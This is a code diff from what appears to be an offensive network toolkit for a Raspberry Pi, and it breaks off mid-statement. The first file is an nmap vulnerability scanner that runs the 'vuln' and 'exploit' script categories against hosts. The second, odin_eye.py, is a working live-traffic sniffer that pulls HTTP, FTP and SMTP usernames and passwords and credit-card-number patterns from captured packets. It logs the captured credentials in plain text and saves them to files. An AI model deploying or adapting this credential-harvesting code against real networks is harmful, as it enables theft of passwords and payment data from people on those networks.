logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
# 1) metadata depuis la queue
if self.shared_data.orchestrator_should_exit:
return 'failed'
# 1) Metadata
meta = {}
try:
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# 2) récupérer MAC et TOUS les ports de l'hôte
# 2) Récupérer MAC et TOUS les ports
mac = row.get("MAC Address") or row.get("mac_address") or ""
# ✅ FORCER la récupération de TOUS les ports depuis la DB
ports_str = ""
if mac:
r = self.shared_data.db.query(
@@ -64,8 +73,7 @@ class NmapVulnScanner:
)
if r and r[0].get('ports'):
ports_str = r[0]['ports']
# Fallback sur les métadonnées si besoin
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
@@ -73,143 +81,240 @@ class NmapVulnScanner:
)
if not ports_str:
logger.warning(f"⚠️ No ports to scan for {ip}")
logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed'
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
logger.debug(f"📋 Found {len(ports)} ports for {ip}: {ports[:5]}...")
# ✅ FIX : Ne filtrer QUE si config activée ET déjà scanné
# Nettoyage des ports (garder juste le numéro si format 80/tcp)
ports = [p.split('/')[0] for p in ports]
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
# 3) Filtrage "Rescan Only"
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"🔄 Filtered {original_count - len(ports)} already-scanned ports")
logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if not ports:
logger.info(f"No new/changed ports to scan for {ip}")
logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success'
# Scanner (mode rapide par défaut)
logger.info(f"🚀 Starting nmap scan on {len(ports)} ports for {ip}")
# 4) SCAN AVEC PROGRESSION
if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
# Persistance (split CVE/CPE)
if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
# 5) Déduplication en mémoire avant persistance
findings = self._deduplicate_findings(findings)
# 6) Persistance
self.save_vulnerabilities(mac, ip, findings)
logger.success(f"✅ Vuln scan done on {ip}: {len(findings)} entries")
# Finalisation UI
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
"""Vérifie si l'hôte a déjà été scanné au moins une fois."""
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
"""
Retourne la liste des ports à scanner en excluant ceux déjà scannés récemment.
"""
if not ports:
return []
# Ports déjà couverts par detected_software (is_active=1)
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
p = str(r['port'])
ls = r.get('last_seen')
seen[p] = ls
seen[str(r['port'])] = r.get('last_seen')
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
def fresh(port: str) -> bool:
ls = seen.get(port)
if not ls:
return False
try:
dt = datetime.fromisoformat(ls.replace('Z',''))
return dt >= cutoff
except Exception:
return True
return [p for p in ports if (p not in seen) or (not fresh(p))]
final_ports = []
for p in ports:
if p not in seen:
final_ports.append(p)
else:
try:
dt = datetime.fromisoformat(seen[p].replace('Z', ''))
if dt < cutoff:
final_ports.append(p)
except Exception:
pass
return final_ports
else:
# Sans TTL: si déjà scanné/présent actif => on skip
return [p for p in ports if p not in seen]
# ---------------------------- Scanning ------------------------------ #
# ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
def extract_cves(self, text: str) -> List[str]:
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
if not text:
return []
return CVE_RE.findall(str(text))
# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""Mode rapide CPE/CVE ou fallback lourd."""
fast = bool(self.shared_data.config.get('vuln_fast', True))
"""
Orchestre le scan en lots (batches) pour permettre la mise à jour
de la barre de progression.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
p_list = [str(p).split('/')[0] for p in ports if str(p).strip()]
port_list = ','.join(p_list[:max_ports]) if p_list else ''
# Pause entre batches important sur Pi Zero pour laisser respirer le CPU
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
if not port_list:
logger.warning("No valid ports for scan")
# Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return []
if fast:
return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
else:
return self._scan_heavy(ip, port_list)
batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
processed_count = 0
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Mise à jour UI avant le scan du lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan du lot (instanciation locale pour éviter la corruption d'état)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Mise à jour post-lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# Pause CPU entre batches (vital sur Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
"""Scan rapide pour récupérer CPE et (option) CVE via vulners."""
vulns: List[Dict] = []
nm = nmap.PortScanner() # Instance locale pas de partage d'état
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s"
# --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
# --min-rate/--max-rate : évite de saturer CPU et réseau
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})")
logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try:
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Fast scan failed to start: {e}")
logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns
if ip not in self.nm.all_hosts():
if ip not in nm.all_hosts():
return vulns
host = self.nm[ip]
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# 1) CPE depuis -sV
cpe_values = self._extract_cpe_values(port_info)
for cpe in cpe_values:
# CPE
for cpe in self._extract_cpe_values(port_info):
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE detected: {cpe}"[:500]
'details': f"CPE: {cpe}"
})
# 2) CVE via script 'vulners' (si actif)
try:
# CVE via vulners
if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
@@ -218,97 +323,73 @@ class NmapVulnScanner:
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:500]
'details': str(script_out)[:200]
})
except Exception:
pass
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
"""Ancienne stratégie (plus lente) avec catégorie vuln, etc."""
vulnerabilities: List[Dict] = []
nm = nmap.PortScanner() # Instance locale
vuln_scripts = [
'vuln','exploit','http-vuln-*','smb-vuln-*',
'ssl-*','ssh-*','ftp-vuln-*','mysql-vuln-*',
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate pour ne pas saturer le Pi
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
args = f"-sV --script={script_arg} -T3 --script-timeout 20s"
logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
try:
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Heavy scan failed to start: {e}")
logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities
if ip in self.nm.all_hosts():
host = self.nm[ip]
discovered_ports: Set[str] = set()
if ip not in nm.all_hosts():
return vulnerabilities
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
host = nm[ip]
discovered_ports_in_batch: set = set()
if 'script' in port_info:
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:500]
})
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports_in_batch.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',')
cpes = self.scan_cpe(ip, ports_for_cpe[:10])
vulnerabilities.extend(cpes)
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
# CPE Scan optionnel (sur ce batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities
# ---------------------------- Helpers -------------------------------- #
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
"""Normalise tous les formats possibles de CPE renvoyés par python-nmap."""
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
parts = [x.strip() for x in cpe.splitlines() if x.strip()]
return parts or [cpe]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
try:
return [str(cpe).strip()] if str(cpe).strip() else []
except Exception:
return []
def extract_cves(self, text: str) -> List[str]:
"""Extrait les identifiants CVE d'un texte."""
import re
if not text:
return []
cve_pattern = r'CVE-\d{4}-\d{4,7}'
return re.findall(cve_pattern, str(text), re.IGNORECASE)
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
"""(Fallback lourd) Scan CPE détaillé si demandé."""
cpe_vulns: List[Dict] = []
cpe_vulns = []
nm = nmap.PortScanner() # Instance locale
try:
port_list = ','.join([str(p) for p in ports if str(p).strip()])
if not port_list:
return cpe_vulns
port_list = ','.join([str(p) for p in ports])
# --version-light à la place de --version-all (bien plus rapide)
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
nm.scan(hosts=ip, ports=port_list, arguments=args)
args = "-sV --version-all -T3 --max-retries 2 --host-timeout 45s"
logger.info(f"[CPE] nmap {ip} -p {port_list} ({args})")
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in self.nm.all_hosts():
host = self.nm[ip]
if ip in nm.all_hosts():
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
@@ -319,90 +400,61 @@ class NmapVulnScanner:
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE detected: {cpe}"[:500]
'details': f"CPE: {cpe}"
})
except Exception as e:
logger.error(f"CPE scan error: {e}")
logger.error(f"scan_cpe failed for {ip}: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
"""Sépare CPE et CVE, met à jour les statuts + enregistre les nouveautés."""
# Récupérer le hostname depuis la DB
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1",
(mac,)
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception as e:
logger.debug(f"Could not fetch hostname: {e}")
# Grouper par port avec les infos complètes
findings_by_port = {}
except Exception:
pass
findings_by_port: Dict[int, Dict] = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {
'cves': set(),
'cpes': set(),
'findings': []
}
findings_by_port[port]['findings'].append(f)
findings_by_port[port] = {'cves': set(), 'cpes': set()}
vid = str(f.get('vuln_id', ''))
if vid.upper().startswith('CVE-'):
vid_upper = vid.upper()
if vid_upper.startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid.upper().startswith('CPE:'):
findings_by_port[port]['cpes'].add(vid.split(':', 1)[1])
elif vid.lower().startswith('cpe:'):
findings_by_port[port]['cpes'].add(vid)
elif vid_upper.startswith('CPE:'):
# On stocke sans le préfixe "CPE:"
findings_by_port[port]['cpes'].add(vid[4:])
# 1) Traiter les CVE par port
# 1) CVEs
for port, data in findings_by_port.items():
if data['cves']:
for cve in data['cves']:
try:
existing = self.shared_data.db.query_one(
"SELECT id FROM vulnerabilities WHERE mac_address=? AND vuln_id=? AND port=? LIMIT 1",
(mac, cve, port)
)
if existing:
self.shared_data.db.execute("""
UPDATE vulnerabilities
SET ip=?, hostname=?, last_seen=CURRENT_TIMESTAMP, is_active=1
WHERE mac_address=? AND vuln_id=? AND port=?
""", (ip, hostname, mac, cve, port))
else:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active)
VALUES(?,?,?,?,?,1)
""", (mac, ip, hostname, port, cve))
logger.debug(f"Saved CVE {cve} for {ip}:{port}")
except Exception as e:
logger.error(f"Failed to save CVE {cve}: {e}")
for cve in data['cves']:
try:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
""", (mac, ip, hostname, port, cve))
except Exception as e:
logger.error(f"Save CVE err: {e}")
# 2) Traiter les CPE
# 2) CPEs
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac,
cpe=cpe,
ip=ip,
hostname=hostname,
port=port
mac_address=mac, cpe=cpe, ip=ip,
hostname=hostname, port=port
)
except Exception as e:
logger.error(f"Failed to save CPE {cpe}: {e}")
logger.error(f"Save CPE err: {e}")
logger.info(f"Saved vulnerabilities for {ip} ({mac}): {len(findings_by_port)} ports processed")
logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")

View File

@@ -1,110 +1,85 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os
import json
try:
import psutil
except Exception:
psutil = None
import pyshark
HAS_PYSHARK = True
except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
def _list_net_ifaces() -> list[str]:
names = set()
# 1) psutil si dispo
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
# 2) fallback kernel
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
# sécurité: pas de doublons
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x); seen.add(x)
return unique
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
# Hook appelée par le backend avant affichage UI / sync DB
def compute_dynamic_b_args(base: dict) -> dict:
"""
Compute dynamic arguments at runtime.
Called by the web interface to populate dropdowns, etc.
"""
d = dict(base or {})
# Example: Dynamic interface list
if "interface" in d:
import psutil
interfaces = ["auto"]
try:
for ifname in psutil.net_if_addrs().keys():
if ifname != "lo":
interfaces.append(ifname)
except:
interfaces.extend(["wlan0", "eth0"])
d["interface"]["choices"] = interfaces
return d
logger = Logger(name="odin_eye.py")
# --- MÉTADONNÉES UI SUPPLÉMENTAIRES -----------------------------------------
# Exemples darguments (affichage frontend; aussi persisté en DB via sync_actions)
b_examples = [
{"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
{"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]
# Lien MD (peut être un chemin local servi par votre frontend, ou un http(s))
# Exemple: un README markdown stocké dans votre repo
b_docs_url = "docs/actions/OdinEye.md"
# --- Métadonnées d'action (consommées par shared.generate_actions_json) -----
# -------------------- Action metadata --------------------
b_class = "OdinEye"
b_module = "odin_eye" # nom du fichier sans .py
b_enabled = 0
b_module = "odin_eye"
b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4 # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = (
"Network traffic analyzer for capturing and analyzing data patterns and credentials.\n"
"Requires: tshark (sudo apt install tshark) + pyshark (pip install pyshark)."
)
b_author = "Fabien / Cyberviking"
b_version = "1.0.0"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"
# Schéma d'arguments pour UI dynamique (clé == nom du flag sans '--')
b_args = {
"interface": {
"type": "select", "label": "Network Interface",
"choices": [], # <- Laisser vide: rempli dynamiquement par compute_dynamic_b_args(...)
"type": "select",
"label": "Network Interface",
"choices": ["auto", "wlan0", "eth0"],
"default": "auto",
"help": "Interface à écouter. 'auto' tente de détecter l'interface par défaut." },
"filter": {"type": "text", "label": "BPF Filter", "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"},
"output": {"type": "text", "label": "Output dir", "default": "/home/bjorn/Bjorn/data/output/packets"},
"timeout": {"type": "number", "label": "Timeout (s)", "min": 10, "max": 36000, "step": 1, "default": 300},
"max_packets": {"type": "number", "label": "Max packets", "min": 100, "max": 2000000, "step": 100, "default": 10000},
"help": "Interface to listen on."
},
"filter": {
"type": "text",
"label": "BPF Filter",
"default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
},
"max_packets": {
"type": "number",
"label": "Max packets",
"min": 100,
"max": 100000,
"step": 100,
"default": 1000
},
"save_creds": {
"type": "checkbox",
"label": "Save Credentials",
"default": True
}
}
# ----------------- Code d'analyse (ton code existant) -----------------------
import os, json, pyshark, argparse, logging, re, threading, signal
from datetime import datetime
from collections import defaultdict
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "odin_eye_settings.json")
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
@@ -120,297 +95,153 @@ CREDENTIAL_PATTERNS = {
}
class OdinEye:
def __init__(self, interface, capture_filter=DEFAULT_FILTER, output_dir=DEFAULT_OUTPUT_DIR,
timeout=300, max_packets=10000):
self.interface = interface
self.capture_filter = capture_filter
self.output_dir = output_dir
self.timeout = timeout
self.max_packets = max_packets
def __init__(self, shared_data):
self.shared_data = shared_data
self.capture = None
self.stop_capture = threading.Event()
self.stop_event = threading.Event()
self.statistics = defaultdict(int)
self.credentials = []
self.interesting_patterns = []
self.credentials: List[Dict[str, Any]] = []
self.lock = threading.Lock()
def process_packet(self, packet):
"""Analyze a single packet for patterns and credentials."""
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
self.analyze_tcp_packet(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
# HTTP
if hasattr(packet, 'http'):
self._analyze_http(packet)
# FTP
elif hasattr(packet, 'ftp'):
self._analyze_ftp(packet)
# SMTP
elif hasattr(packet, 'smtp'):
self._analyze_smtp(packet)
# Payload generic check
if hasattr(packet.tcp, 'payload'):
self._analyze_payload(packet.tcp.payload)
def analyze_tcp_packet(self, packet):
try:
if hasattr(packet, 'http'):
self.analyze_http_packet(packet)
elif hasattr(packet, 'ftp'):
self.analyze_ftp_packet(packet)
elif hasattr(packet, 'smtp'):
self.analyze_smtp_packet(packet)
if hasattr(packet.tcp, 'payload'):
self.analyze_payload(packet.tcp.payload)
except Exception as e:
logging.error(f"Error analyzing TCP packet: {e}")
logger.debug(f"Packet processing error: {e}")
def analyze_http_packet(self, packet):
try:
if hasattr(packet.http, 'request_uri'):
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
matches = re.findall(pattern, packet.http.request_uri)
if matches:
with self.lock:
self.credentials.append({
'protocol': 'HTTP',
'type': field,
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing HTTP packet: {e}")
def _analyze_http(self, packet):
if hasattr(packet.http, 'request_uri'):
uri = packet.http.request_uri
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
m = re.findall(pattern, uri, re.I)
if m:
self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
def analyze_ftp_packet(self, packet):
try:
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
with self.lock:
self.credentials.append({
'protocol': 'FTP',
'type': 'username' if cmd == 'USER' else 'password',
'value': packet.ftp.request_arg,
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing FTP packet: {e}")
def _analyze_ftp(self, packet):
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
field = 'username' if cmd == 'USER' else 'password'
self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
def analyze_smtp_packet(self, packet):
try:
if hasattr(packet.smtp, 'command_line'):
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
matches = re.findall(pattern, packet.smtp.command_line)
if matches:
with self.lock:
self.credentials.append({
'protocol': 'SMTP',
'type': 'auth',
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing SMTP packet: {e}")
def _analyze_smtp(self, packet):
if hasattr(packet.smtp, 'command_line'):
line = packet.smtp.command_line
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
m = re.findall(pattern, line, re.I)
if m:
self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
def analyze_payload(self, payload):
def _analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b',
'ip_address': r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
}
for name, pattern in patterns.items():
matches = re.findall(pattern, payload)
if matches:
with self.lock:
self.interesting_patterns.append({
'type': name,
'value': matches[0],
'timestamp': datetime.now().isoformat()
})
m = re.findall(pattern, payload)
if m:
self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
def _add_cred(self, proto, field, value, source):
with self.lock:
cred = {
'protocol': proto,
'type': field,
'value': value,
'timestamp': datetime.now().isoformat(),
'source': source
}
if cred not in self.credentials:
self.credentials.append(cred)
logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
def execute(self, ip, port, row, status_key) -> str:
"""Standard entry point."""
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
if iface == "auto":
iface = None # pyshark handles None as default
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
def save_results(self):
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"capture_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump(dict(self.statistics), f, indent=4)
if self.credentials:
creds_file = os.path.join(self.output_dir, f"credentials_{timestamp}.json")
with open(creds_file, 'w') as f:
json.dump(self.credentials, f, indent=4)
if self.interesting_patterns:
patterns_file = os.path.join(self.output_dir, f"patterns_{timestamp}.json")
with open(patterns_file, 'w') as f:
json.dump(self.interesting_patterns, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
try:
# Timeout thread (inchangé) ...
if self.timeout and self.timeout > 0:
def _stop_after():
self.stop_capture.wait(self.timeout)
self.stop_capture.set()
threading.Thread(target=_stop_after, daemon=True).start()
logging.info(...)
self.capture = pyshark.LiveCapture(interface=self.interface, bpf_filter=self.capture_filter)
# Interruption douce — SKIP si on tourne en mode importlib (thread)
if os.environ.get("BJORN_EMBEDDED") != "1":
try:
signal.signal(signal.SIGINT, self.handle_interrupt)
signal.signal(signal.SIGTERM, self.handle_interrupt)
except Exception:
# Ex: ValueError si pas dans le main thread
pass
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
start_time = time.time()
packet_count = 0
# Use sniff_continuously for real-time processing
for packet in self.capture.sniff_continuously():
if self.stop_capture.is_set() or self.statistics['total_packets'] >= self.max_packets:
if self.shared_data.orchestrator_should_exit:
break
if time.time() - start_time > timeout:
logger.info("OdinEye: Timeout reached.")
break
packet_count += 1
if packet_count >= max_pkts:
logger.info("OdinEye: Max packets reached.")
break
self.process_packet(packet)
# Periodic progress update (every 50 packets)
if packet_count % 50 == 0:
prog = int((packet_count / max_pkts) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
except Exception as e:
logging.error(f"Capture error: {e}")
logger.error(f"Capture error: {e}")
self.shared_data.log_milestone(b_class, "Error", str(e))
return "failed"
finally:
self.cleanup()
if self.capture:
try: self.capture.close()
except: pass
# Save results
if self.credentials or self.statistics['total_packets'] > 0:
os.makedirs(output_dir, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
json.dump({
"stats": dict(self.statistics),
